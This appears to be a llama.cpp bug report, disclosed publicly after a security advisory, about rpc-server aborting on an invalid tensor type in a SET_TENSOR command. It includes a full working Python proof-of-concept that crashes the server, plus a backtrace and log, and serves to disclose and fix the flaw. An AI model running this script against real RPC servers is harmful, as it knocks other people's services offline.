Description
Name and Version
$ llama-cli --version
register_backend: registered backend Metal (1 devices)
register_device: registered device Metal (Apple M1 Pro)
register_backend: registered backend BLAS (1 devices)
register_device: registered device BLAS (Accelerate)
register_backend: registered backend RPC (0 devices)
register_backend: registered backend CPU (1 devices)
register_device: registered device CPU (Apple M1 Pro)
version: 5169 (6cf3a31e)
built with Apple clang version 17.0.0 (clang-1700.0.13.3) for arm64-apple-darwin24.4.0
Operating systems
Mac
Which llama.cpp modules do you know to be affected?
Other (Please specify in the next section)
Command line
./build/bin/rpc-server -p 50052
Problem description & steps to reproduce
Description
NOTE: This was originally reported as a security advisory. After discussing with the maintainers this has now been disclosed as a public issue, since the RPC server is still an experimental feature (see RPC example).
The rpc-server
crashes when processing an RPC_CMD_SET_TENSOR
command if the provided data contains an invalid ggml_type
value within the rpc_tensor
structure. The server doesn't validate the type
field read from the network before using it internally. This leads to a failed assertion (GGML_ASSERT(type >= 0 && type < GGML_TYPE_COUNT)
) during tensor deserialization (likely in ggml_new_tensor_4d
), causing the server process to abort()
.
Expected Behavior
The server should validate the ggml_type
read from the SET_TENSOR
data before passing it to GGML functions. If the type is invalid, the server should:
- Log an error message indicating invalid input.
- Reject the command (e.g., send an error response or simply close the connection).
- Continue running without crashing.
Actual Behavior
The server reads the invalid ggml_type
(e.g., 65 if the payload starts with 'A' bytes) and uses it internally. A GGML_ASSERT
checking the type validity fails, causing the server process to terminate via abort()
. The client typically sees the connection break unexpectedly.
Steps to Reproduce
- Clone the repository:
git clone [email protected]:ggml-org/llama.cpp.git && cd llama.cpp
- Build the
rpc-server
binary:cmake -B build . -DGGML_RPC=ON && cd build && cmake --build . --config Release --target rpc-server
- Run the server from the
build
directory:./bin/rpc-server -p 50052
- Run the Python Proof of Concept script below (save as
poc_rpc_crash.py
):python poc_rpc_crash.py
import socket
import struct
import sys
import time
# Server details (change if needed)
DEFAULT_HOST = "127.0.0.1"
DEFAULT_PORT = 50052
# GGML RPC Commands (enum rpc_cmd)
RPC_CMD_SET_TENSOR = 6
RPC_CMD_HELLO = 14
# Size definitions
PAYLOAD_DATA_SIZE = 1 * 1024 # 1 KB of 'A's
INTERNAL_SIZE_FIELD_VAL = PAYLOAD_DATA_SIZE # Value for the internal size field
CHUNK_SIZE = 1024 # Send data in 1KB chunks
# --- Helper Functions ---
def p8(value):
"""Packs an integer into a 1-byte byte string (unsigned char)."""
return struct.pack('<B', value)
def p64(value):
"""Packs an integer into an 8-byte byte string (unsigned long long)."""
return struct.pack('<Q', value)
def u64(value_bytes):
"""Unpacks an 8-byte byte string into an integer (unsigned long long)."""
return struct.unpack('<Q', value_bytes)[0]
def recv_exact(sock, num_bytes):
"""Receives exactly num_bytes from the socket."""
data = b''
start_time = time.time()
# Use socket timeout if set
timeout = sock.gettimeout()
while len(data) < num_bytes:
try:
# Check for timeout if applicable
if timeout and (time.time() - start_time > timeout):
print(f"[-] Socket timeout after {timeout}s waiting for {num_bytes} bytes (got {len(data)})", file=sys.stderr)
return None
# Calculate remaining bytes, request at most CHUNK_SIZE
remaining = num_bytes - len(data)
chunk = sock.recv(min(remaining, CHUNK_SIZE))
if not chunk:
# Connection closed prematurely
print(f"[-] Connection closed by peer while trying to receive {num_bytes} bytes (got {len(data)})", file=sys.stderr)
return None
data += chunk
except socket.timeout:
print(f"[-] Socket timeout explicitly caught waiting for {num_bytes} bytes (got {len(data)})", file=sys.stderr)
return None
except OSError as e:
print(f"[-] Socket error during recv_exact: {e}", file=sys.stderr)
return None
return data
def send_all(sock, data):
"""Sends all data reliably."""
try:
sock.sendall(data)
return True
except OSError as e:
print(f"[-] Socket error during send_all: {e}", file=sys.stderr)
return False
def send_data_chunks_native(sock, size):
"""Sends 'size' bytes of 'A' in chunks using standard sockets."""
bytes_sent = 0
num_chunks = (size + CHUNK_SIZE - 1) // CHUNK_SIZE
for i in range(num_chunks):
current_chunk_size = min(CHUNK_SIZE, size - bytes_sent)
chunk = b'A' * current_chunk_size
if not send_all(sock, chunk):
print(f"[-] Failed to send chunk {i+1}", file=sys.stderr)
return False
bytes_sent += current_chunk_size
return True
# --- Main Logic ---
def run_exploit_native(host, port):
print(f"[*] Connecting to {host}:{port}...")
sock = None
try:
# Set a connection timeout
sock = socket.create_connection((host, port), timeout=10)
print("[+] Connected.")
# Set a timeout for subsequent socket operations
sock.settimeout(15)
print("[*] Performing HELLO handshake...")
hello_cmd = p8(RPC_CMD_HELLO)
hello_input_size = p64(0)
hello_packet = hello_cmd + hello_input_size
if not send_all(sock, hello_packet): raise ConnectionError("Failed to send HELLO packet")
hello_resp_size_bytes = recv_exact(sock, 8)
if not hello_resp_size_bytes: raise ConnectionError("Server closed during HELLO response size read")
hello_resp_size = u64(hello_resp_size_bytes)
# Expecting 3 bytes: major, minor, patch version
if hello_resp_size < 3:
# Allow for potential future expansion, but need at least 3 for version
print(f"[!] Warning: Unexpected HELLO response size: {hello_resp_size}. Expected >= 3.")
# Attempt to read anyway if size > 0
if hello_resp_size == 0:
raise ValueError("HELLO response size is zero.")
hello_resp_data = recv_exact(sock, hello_resp_size)
if not hello_resp_data or len(hello_resp_data) < 3:
raise ConnectionError("Incomplete HELLO response data received")
print(f"[+] HELLO ok (v{hello_resp_data[0]}.{hello_resp_data[1]}.{hello_resp_data[2]}) Received {len(hello_resp_data)} bytes total.")
print("[*] Attempting crash via SET_TENSOR with invalid type in 1KB payload...")
cmd = p8(RPC_CMD_SET_TENSOR)
# This is the size field read by recv_msg to determine buffer size
internal_size_field = p64(INTERNAL_SIZE_FIELD_VAL)
# This is the 'total payload size' field sent after the command byte.
# It should reflect the size of data *following* this field.
# In this case, it's the internal_size_field (8 bytes) + the actual garbage data (PAYLOAD_DATA_SIZE bytes)
actual_payload_size_val = 8 + PAYLOAD_DATA_SIZE
actual_payload_size_field = p64(actual_payload_size_val)
# Header: command_byte (1) + actual_payload_size (8) + internal_size_field (8)
fixed_header = cmd + actual_payload_size_field + internal_size_field
print(f"[*] Sending header (Cmd: {RPC_CMD_SET_TENSOR}, TotalPayloadSize: {actual_payload_size_val}, InternalResizeField: {u64(internal_size_field):#x}) -> {len(fixed_header)} bytes")
if not send_all(sock, fixed_header):
raise ConnectionError("Failed to send fixed header")
# Send the 1KB garbage data ('A' * 1024)
print(f"[*] Sending {PAYLOAD_DATA_SIZE} bytes of garbage data ('A' * {PAYLOAD_DATA_SIZE})...")
if not send_data_chunks_native(sock, PAYLOAD_DATA_SIZE):
raise ConnectionError("Failed during data chunk send")
print(f"[+] Header and {PAYLOAD_DATA_SIZE} bytes of data sent.")
# Expect the server to crash after receiving data and trying to process it
print("[*] Waiting for server disconnect (expecting crash after processing header)...")
# Try receiving a small amount of data. An empty read means disconnected (crashed).
# Using a longer timeout here as processing might take a moment before crash
sock.settimeout(10)
recv_data = None
try:
recv_data = sock.recv(1024)
except socket.timeout:
# This could happen if the server hangs instead of crashing, less likely for this specific bug
print("[-] Timeout waiting for server disconnect. Server might be hung?")
# Still consider it potentially successful if timeout occurs after sending bad data
print("[?] Vulnerability might still be triggered if server is unresponsive.")
return # Exit gracefully
except OSError as e:
# Connection reset/broken pipe often indicates server crash
print(f"[+] Socket error likely indicating server crash: {e}. Vulnerability Confirmed.")
return # Exit gracefully
if recv_data:
print(f"[-] Received unexpected data ({len(recv_data)} bytes): {recv_data[:64]}... Server might not have crashed.")
else:
# recv() returning 0 bytes means the other side closed the connection cleanly.
print("[+] Connection closed by server (received 0 bytes - likely crashed due to assertion failure). Vulnerability Confirmed.")
except ConnectionRefusedError:
print(f"[-] Connection refused by {host}:{port}. Is the server running?", file=sys.stderr)
except socket.timeout:
print("[-] Timeout during connection or initial handshake. Check server state.", file=sys.stderr)
except (ConnectionError, ValueError, OSError, struct.error) as e:
print(f"[-] An error occurred: {e}", file=sys.stderr)
except Exception as e:
print(f"[-] An unexpected error occurred: {e}", file=sys.stderr)
import traceback
traceback.print_exc()
finally:
if sock:
sock.close()
print("[*] Connection closed.")
if __name__ == "__main__":
target_host = DEFAULT_HOST
target_port = DEFAULT_PORT
if len(sys.argv) > 1:
target_host = sys.argv[1]
if len(sys.argv) > 2:
try:
target_port = int(sys.argv[2])
except ValueError:
print(f"[-] Invalid port: {sys.argv[2]}", file=sys.stderr)
sys.exit(1)
run_exploit_native(target_host, target_port)
Debugger backtrace to confirm crash:
* thread #1, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
* frame #0: 0x0000000199164388 libsystem_kernel.dylib`__pthread_kill + 8
frame #1: 0x000000019919d88c libsystem_pthread.dylib`pthread_kill + 296
frame #2: 0x00000001990a6c60 libsystem_c.dylib`abort + 124
frame #3: 0x000000010032d31c libggml-base.dylib`ggml_abort + 116
frame #4: 0x000000010032eb54 libggml-base.dylib`ggml_new_tensor_impl + 824
frame #5: 0x000000010032ed08 libggml-base.dylib`ggml_new_tensor_4d + 56
frame #6: 0x000000010005ed18 libggml-rpc.dylib`rpc_server::deserialize_tensor(ggml_context*, rpc_tensor const*) + 56
frame #7: 0x000000010005f208 libggml-rpc.dylib`rpc_server::set_tensor(std::__1::vector<unsigned char, std::__1::allocator<unsigned char>> const&) + 136
frame #8: 0x00000001000610ac libggml-rpc.dylib`ggml_backend_rpc_start_server + 2008
frame #9: 0x0000000100003214 rpc-server`main + 3012
frame #10: 0x0000000198dfeb4c dyld`start + 6000
First Bad Commit
Relevant log output
Starting RPC server v1.0.0
endpoint : 127.0.0.1:50052
local cache : n/a
backend memory : 16384 MB
Accepted client connection, free_mem=17179869184, total_mem=17179869184
/Users/ville/git/llama.cpp/ggml/src/ggml.c:1568: GGML_ASSERT(type >= 0 && type < GGML_TYPE_COUNT) failed
[1] 61001 abort ./bin/rpc-server